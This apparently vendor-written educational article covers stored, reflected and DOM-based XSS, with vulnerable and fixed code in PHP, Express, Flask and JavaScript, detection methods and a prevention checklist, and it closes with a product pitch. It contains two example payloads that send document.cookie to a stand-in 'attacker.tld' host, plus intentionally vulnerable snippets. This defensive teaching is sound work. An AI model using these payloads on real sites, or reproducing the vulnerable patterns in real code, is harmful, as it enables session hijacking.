Stored vs Reflected XSS: Two Attacks, Different Detection
In 2014, attackers planted JavaScript inside eBay product listings that ran in the browser of every shopper who clicked through. The payload sat in the listing description field, which eBay rendered as HTML, and it stayed there for months while sellers used it to harvest session cookies and redirect victims to credential-stealing pages. That is stored XSS in one sentence: a payload that lives on the server and detonates in every visitor's browser. Compare it to this URL, which probably looks familiar:
https://shop.example.com/search?q=<script>fetch('//attacker.tld/?c='+document.cookie)</script>That is reflected XSS: a payload that lives in the request, gets echoed back into the response, and only fires when somebody clicks the link. Both end with attacker-controlled JavaScript executing inside your origin. The mechanics overlap, the impact differs, and the detection strategies diverge in ways that matter when you are picking tools or writing remediation guidance.
The Mechanic in One Paragraph
Every XSS variant collapses to the same root cause. The application receives data from somewhere it does not control, drops that data into an HTML response without escaping it for the surrounding context, and the browser parses the result and executes whatever JavaScript it finds. Because the script runs inside the application's origin, it inherits the user's session cookies, can call any same-origin endpoint, and can read the DOM of any page on that origin. The attacker steals what the legitimate user can do: session tokens, CSRF tokens, form contents, anything reachable from the same browsing context. The distinction between stored, reflected, and DOM-based is just where the unsafe data enters the pipeline and how it reaches the sink.
Reflected XSS
Reflected XSS is the URL-parameter case. Something in the request — a query string, a form field, a header echoed into an error page — ends up in the HTML response without encoding. The attack requires delivery: the victim has to click a crafted link, scan a poisoned QR code, or load a page that submits a hidden form to the vulnerable endpoint. Here is the canonical search-page bug in PHP:
<?php
$query = $_GET['q'];
echo "<h1>Results for: $query</h1>";
?> Visit /search.php?q=<script>alert(1)</script> and the browser parses the script tag exactly as written. The fix is context-aware output encoding — for HTML body context, that means HTML-entity-encoding the angle brackets and ampersands so the parser treats them as text:
<?php
$query = $_GET['q'];
echo "<h1>Results for: " . htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "</h1>";
?>The same bug in Express looks like this, and the fix is the same idea expressed through a templating engine that auto-escapes by default:
// Vulnerable: raw concatenation into the response
app.get('/search', (req, res) => {
res.send(`<h1>Results for: ${req.query.q}</h1>`);
});
// Fixed: render through a template that escapes by default
app.get('/search', (req, res) => {
res.render('search', { q: req.query.q }); // Pug, EJS with <%= %>, etc.
}); Modern frameworks default to escaping for a reason. The bugs that survive into production are usually the ones where someone reached past the safe API — v-html in Vue, dangerouslySetInnerHTML in React, raw triple-mustache ({{{ }}}) in Handlebars — to render data that they believed was trusted but wasn't.
Stored XSS
Stored XSS skips the delivery problem. The payload goes into the database, and every user who loads the affected page gets it, automatically. Comment fields, profile bios, product reviews, support tickets, chat messages, anything where one user's input is shown to another user is a candidate. Here is a Flask comment endpoint that stores raw HTML and renders it back without escaping:
@app.route('/comments', methods=['POST'])
def add_comment():
body = request.form['body']
db.execute('INSERT INTO comments (body) VALUES (?)', (body,))
return redirect('/post/1')
@app.route('/post/<int:post_id>')
def view_post(post_id):
rows = db.execute('SELECT body FROM comments WHERE post_id = ?', (post_id,)).fetchall()
html = '<ul>'
for row in rows:
html += f'<li>{row["body"]}</li>' # raw interpolation
html += '</ul>'
return html Submit <img src=x onerror="fetch('//attacker.tld/?c='+document.cookie)"> as a comment and every subsequent visitor to that post ships their session cookie to the attacker. The fix is to render through Jinja's autoescape, which is the default when templates have an .html extension:
@app.route('/post/<int:post_id>')
def view_post(post_id):
rows = db.execute('SELECT body FROM comments WHERE post_id = ?', (post_id,)).fetchall()
return render_template('post.html', comments=rows)
# templates/post.html
# <ul>{% for c in comments %}<li>{{ c.body }}</li>{% endfor %}</ul> If the application genuinely needs to render user-supplied HTML — a rich-text editor, a markdown preview — the right tool is a sanitization library that parses the HTML, walks the AST, and strips anything not on a strict allowlist. DOMPurify on the client, bleach in Python, HtmlSanitizer in .NET. Regex-based filtering is a known dead end; the parser will always find a payload your regex didn't anticipate.
Why Stored Is Usually Worse
Reflected XSS needs a delivery mechanism. The attacker has to convince the victim to click a link, and the link itself often looks suspicious enough to filter on, train against, or block at the email gateway. Stored XSS needs nothing. The victim visits a page they would have visited anyway — the product they bought, the support thread they filed, the profile of someone they follow — and the payload runs. Every authenticated user who loads the affected view is exploited automatically, which means the blast radius scales with traffic and the dwell time can be measured in months. Brand damage is also worse: stored XSS often manifests as visible defacement or unauthorized redirects, which surface in user complaints and press coverage long before any incident response team identifies the root cause.
DOM-Based XSS
The third category lives entirely in the browser. The server never sees the payload; the JavaScript on the page reads attacker-controlled data from a source like location.hash, document.referrer, or postMessage, and writes it to a sink like innerHTML, document.write, or eval. The classic example:
// Vulnerable: hash fragment goes straight into innerHTML
document.getElementById('greeting').innerHTML = 'Hello, ' + location.hash.slice(1);
// Fixed: textContent treats the value as text, not markup
document.getElementById('greeting').textContent = 'Hello, ' + location.hash.slice(1);DOM XSS is harder for server-side scanners and proxies to see, because the dangerous data flow happens after the response leaves the server. Detection requires either static analysis of the client-side bundle or a DAST tool that executes JavaScript and instruments DOM sinks at runtime. SPAs that route on the URL fragment and render through innerHTML are the prototypical risk.
Detection
SAST detects XSS by tracing data flow from sources (HTTP request parameters, cookies, headers, database reads of user-supplied content) to sinks (HTML response writers, template raw-output directives, innerHTML, document.write). When the path from source to sink does not pass through a recognized encoding or sanitization function, the analyzer flags the issue with the full taint path attached. This is what data flow analysis buys you over pattern matching: a regex sees that request.form['body'] appears in the file; a taint engine sees that the same value reaches an unescaped HTML write three function calls later.
DAST takes the runtime approach. The scanner submits a library of XSS payloads against every discovered parameter, then inspects responses for evidence of reflection or stored persistence. Headless-browser DAST also instruments the DOM to detect client-side sinks. Both approaches have well-known coverage gaps: SAST struggles with reflective frameworks where the data flow is dynamic, DAST struggles with payloads that require multi-step state to surface. Content Security Policy with script-src 'self' 'nonce-...' is not detection at all — it is a runtime mitigation that prevents inline-script payloads from executing even when the underlying bug ships. Treat CSP as defense in depth, not as a substitute for fixing the source.
Prevention Checklist
- Output-encode in the right context. HTML body, HTML attribute, JavaScript string, URL, and CSS each require a different encoding. Get this from your framework's helpers, not by hand.
- Trust your template engine's auto-escape. Reach for
v-html,dangerouslySetInnerHTML, or raw template directives only when you have parsed and sanitized the input first. - Sanitize on output, not on input. Storage-time filtering breaks legitimate use of angle brackets in text and creates a false sense of safety; the right defense lives at the rendering boundary.
- Deploy a strict Content Security Policy.
script-src 'self' 'nonce-{random}'blocks the most common payload styles even when an XSS bug ships. - Mark cookies HttpOnly, Secure, and SameSite. HttpOnly takes
document.cookieoff the table for session theft; SameSite limits CSRF chaining off the back of an XSS. - Use a maintained sanitizer for rich-text input.
DOMPurify,bleach,HtmlSanitizer— never roll your own with regex.
How GraphNode Handles This
GraphNode SAST traces reflected, stored, and DOM-based XSS through full data flow analysis across method boundaries, with sanitization detection that prevents false positives when input has already passed through a recognized encoder. Coverage spans 13+ languages including PHP, JavaScript, Python, Java, C#, Swift, and Kotlin, with rules mapped to OWASP Top 10 and CWE. For the broader injection-class context, see the A03 injection guide.
Closing
Stored and reflected XSS share a root cause and split on delivery. Reflected needs a click; stored needs a page view. Both kill the same way once they fire, which is why the prevention story is mostly the same — encode at the boundary, trust your framework, sanitize when you must render markup, and layer CSP underneath as the safety net for the bug you missed. The detection story splits cleanly: trace the taint at commit time so the bug never reaches a deployed environment, then let DAST and CSP catch what slipped through.
GraphNode SAST traces user input from request to template sink across 13+ languages — request a demo.
Request Demo